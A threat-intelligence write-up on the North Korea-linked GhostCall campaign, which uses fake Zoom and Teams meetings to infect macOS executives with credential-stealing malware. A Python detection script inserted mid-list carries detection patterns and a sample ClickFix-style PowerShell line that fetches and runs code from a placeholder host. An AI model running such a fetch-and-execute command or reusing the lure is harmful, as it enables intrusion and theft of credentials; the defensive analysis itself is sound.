GhostCall Malware Campaign
Cybersecurity researchers have uncovered a sophisticated campaign targeting the Web3 and blockchain sectors, tracked as GhostCall. The operation is part of a broader North Korea-linked initiative called SnatchCrypto, active since at least 2017. The threat is attributed to the Lazarus Group sub-cluster BlueNoroff, also known by multiple aliases including APT38, CageyChameleon, CryptoCore, Genie Spider, Nickel Gladstone, Sapphire Sleet, and Stardust Chollima.
Victims of the campaign have been identified across multiple macOS hosts in Japan, Italy, France, Singapore, Turkey, Spain, Sweden, India, and Hong Kong.
Sophisticated Social Engineering and Phishing Techniques
GhostCall focuses heavily on macOS devices of executives in tech companies and venture capital firms. Attackers directly contact targets via platforms like Telegram, inviting them to investment-related meetings hosted on Zoom-like phishing websites.
Key aspects of the attack:
- Victims join fake calls containing genuine recordings of other victims instead of deepfakes.
- During the call, users are prompted to 'update' Zoom or Teams via a malicious script.
- The script downloads ZIP files that initiate multi-stage infection chains on the host.
The campaign has been active since mid-2023, likely following the RustBucket campaign, which marked the group's strategic pivot to macOS-focused attacks. Subsequent malware families deployed include KANDYKORN, ObjCShellz, and TodoSwift.
Deceptive Fake Zoom and Teams Pages
Targets landing on the GhostCall phishing pages initially see what appears to be a live call, which shortly afterwards gives way to an error message. The message prompts users to download a Zoom or Teams Software Development Kit (SDK) to continue the call.
- On macOS, clicking 'Update Now' downloads a malicious AppleScript.
- On Windows, attackers use the ClickFix technique to execute a PowerShell command.
- Every interaction with the fake site is tracked, allowing attackers to monitor victim behavior.
The campaign has since expanded from Zoom to Microsoft Teams, using TeamsFx SDK downloads to continue the infection chain.
Malware and Infection Chains
Whichever lure is used (Zoom or Teams), the AppleScript installs phony Zoom or Teams apps and downloads DownTroy, which harvests passwords from password managers and installs additional malware with root privileges. GhostCall leverages eight distinct attack chains, including:
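As an added illustration (not code from the original report or from any vendor's tooling), the following Python heuristic triages endpoint process-execution events for the lure pattern described in the two passages above: a script interpreter running a Zoom/Teams-themed script from a download location on macOS, osascript spawned directly by a browser or messaging app, a Zoom/Teams app bundle executing from outside /Applications, and a ClickFix-style PowerShell one-liner fetching remote content under a Zoom/Teams update pretext. The event schema, the field names, the sample events and the regular-expression heuristics are all assumptions constructed for this example; the campaign's actual indicators are not given on this page.

```python
"""
Heuristic triage of process-execution telemetry for the GhostCall lure pattern:
a fake Zoom/Teams "update" page hands the victim an AppleScript (macOS) or a
ClickFix PowerShell one-liner (Windows), which then fetches further stages.
The ProcEvent schema and every pattern below are assumptions for this example,
not the format of any particular EDR product and not published campaign IoCs.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    host: str
    os: str       # "macos" or "windows" (assumed normalised by the collector)
    parent: str   # parent process image name
    image: str    # executed image name or path
    cmdline: str  # full command line


# Generic heuristics derived from the chain description (assumptions, not IoCs).
SCRIPT_INTERPRETERS_MAC = {"osascript", "bash", "sh", "zsh"}
BROWSERS_AND_MESSENGERS = {"Safari", "Google Chrome", "firefox", "Microsoft Edge", "Telegram"}
USER_WRITABLE = re.compile(r"(?:/Users/[^/]+/Downloads|/tmp|/private/tmp|/var/folders)/", re.I)
MEETING_LURE = re.compile(
    r"(zoom|teams|teamsfx).*(sdk|update|install)|(sdk|update|install).*(zoom|teams)", re.I)
REMOTE_FETCH_PS = re.compile(
    r"(invoke-webrequest|iwr|downloadstring|invoke-expression|iex|curl)\b", re.I)
FAKE_BUNDLE = re.compile(r"/(zoom\.us|Microsoft Teams)[^/]*\.app/", re.I)


def assess(ev: ProcEvent) -> list[str]:
    """Return the heuristic findings for one event (empty list = nothing suspicious)."""
    findings: list[str] = []
    cmd = ev.cmdline
    if ev.os == "macos":
        # Interpreter running a Zoom/Teams-themed script from a user-writable download path.
        if ev.image in SCRIPT_INTERPRETERS_MAC and USER_WRITABLE.search(cmd) and MEETING_LURE.search(cmd):
            findings.append("mac-lure-script: Zoom/Teams-themed script run from a download path")
        # osascript launched straight from a browser or messenger is unusual on its own.
        if ev.image == "osascript" and ev.parent in BROWSERS_AND_MESSENGERS:
            findings.append("mac-osascript-from-browser: osascript spawned by a browser/messenger")
        # A Zoom/Teams-named app bundle executing from somewhere other than /Applications.
        if FAKE_BUNDLE.search(cmd) and not cmd.lower().startswith("/applications/"):
            findings.append("mac-fake-app-bundle: Zoom/Teams bundle running outside /Applications")
    elif ev.os == "windows":
        # ClickFix: the victim pastes a PowerShell line that fetches and runs remote content.
        if (ev.image.lower() in {"powershell.exe", "pwsh.exe"}
                and REMOTE_FETCH_PS.search(cmd) and MEETING_LURE.search(cmd)):
            findings.append("win-clickfix: PowerShell fetching remote content under a Zoom/Teams update pretext")
    return findings


def triage(events: list[ProcEvent]) -> dict[str, list[str]]:
    """Group findings by host so an analyst sees which endpoints need a closer look."""
    flagged: dict[str, list[str]] = {}
    for ev in events:
        for f in assess(ev):
            flagged.setdefault(ev.host, []).append(f)
    return flagged


# Constructed sample telemetry (not real captures): two lure-like hosts, two benign events.
SAMPLE_EVENTS = [
    ProcEvent("mac-exec-01", "macos", "Safari", "osascript",
              "osascript /Users/jane/Downloads/zoom_sdk_update.scpt"),
    ProcEvent("mac-exec-01", "macos", "launchd",
              "/Users/jane/Downloads/zoom.us.app/Contents/MacOS/zoom.us",
              "/Users/jane/Downloads/zoom.us.app/Contents/MacOS/zoom.us"),
    ProcEvent("mac-exec-02", "macos", "Terminal", "bash",
              "bash /Users/tom/projects/build.sh"),
    ProcEvent("win-vc-07", "windows", "explorer.exe", "powershell.exe",
              'powershell -c "iex (iwr https://example.invalid/teams-sdk-update).Content"'),
    ProcEvent("win-vc-07", "windows", "cmd.exe", "powershell.exe",
              "powershell -File C:\\scripts\\backup.ps1"),
]

if __name__ == "__main__":
    for host, findings in triage(SAMPLE_EVENTS).items():
        print(host)
        for f in findings:
            print("  -", f)
```

These heuristics are deliberately broad and will also fire on legitimate updaters or developers scripting from their Downloads folder, so they suit triage enrichment and hunting rather than blocking rules; the browser list, the writable-path pattern and the lure keywords should be tuned to the telemetry actually collected in your environment.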
ZoomClutch / TeamsClutch – Swift-based implant masquerading as Zoom or Teams; prompts system passwords for exfiltration.
DownTroy v1 – Go-based dropper launches AppleScript-based DownTroy to download additional scripts until reboot.
CosmicDoor – C++ loader (GillyInjector) injects a Nim backdoor; capable of destructive file wiping; downloads SilentSiphon.
RooTroy – Nimcore loader injects Go backdoor for device reconnaissance and malware execution.
RealTimeTroy – Nimcore loader injects Go backdoor; communicates via WSS protocol for file and system control.
SneakMain – Nim payload executed via Nimcore loader to run additional AppleScript commands.
DownTroy v2 – CoreKitAgent dropper launches AppleScript-based DownTroy (NimDoor) to retrieve additional scripts.
SysPhon – C++ downloader from RustBucket lineage; used for reconnaissance and binary retrieval.
Additionally, SilentSiphon harvests sensitive data from:
- Apple Notes, Telegram, web browser extensions, password managers
- Developer and cloud platforms: GitHub, GitLab, Bitbucket, npm, Yarn, Python pip, RubyGems, Rust cargo, .NET NuGet, AWS, Google Cloud, Microsoft Azure, Oracle Cloud, Akamai, Linode, DigitalOcean, Vercel, Cloudflare, Netlify, Stripe, Firebase, Twilio, CircleCI, Pulumi, HashiCorp
- Blockchain platforms: Sui, Solana, NEAR, Aptos, Algorand
- System tools: Docker, Kubernetes, OpenAI
Reconnaissance via Fabricated Meetings
The video feeds in fake meetings were recorded by attackers, while profile images of participants were sourced from professional networks such as LinkedIn, Crunchbase, or X (Twitter). Some images were enhanced using GPT-4o, adding a layer of realism to the social engineering ruse.
GhostCall exemplifies the evolution of cyber threats targeting executives in Web3 and venture capital, combining advanced social engineering, cross-platform malware, and sophisticated data harvesting techniques. Vigilance and multi-layered defenses are critical to counter these North Korea-linked campaigns.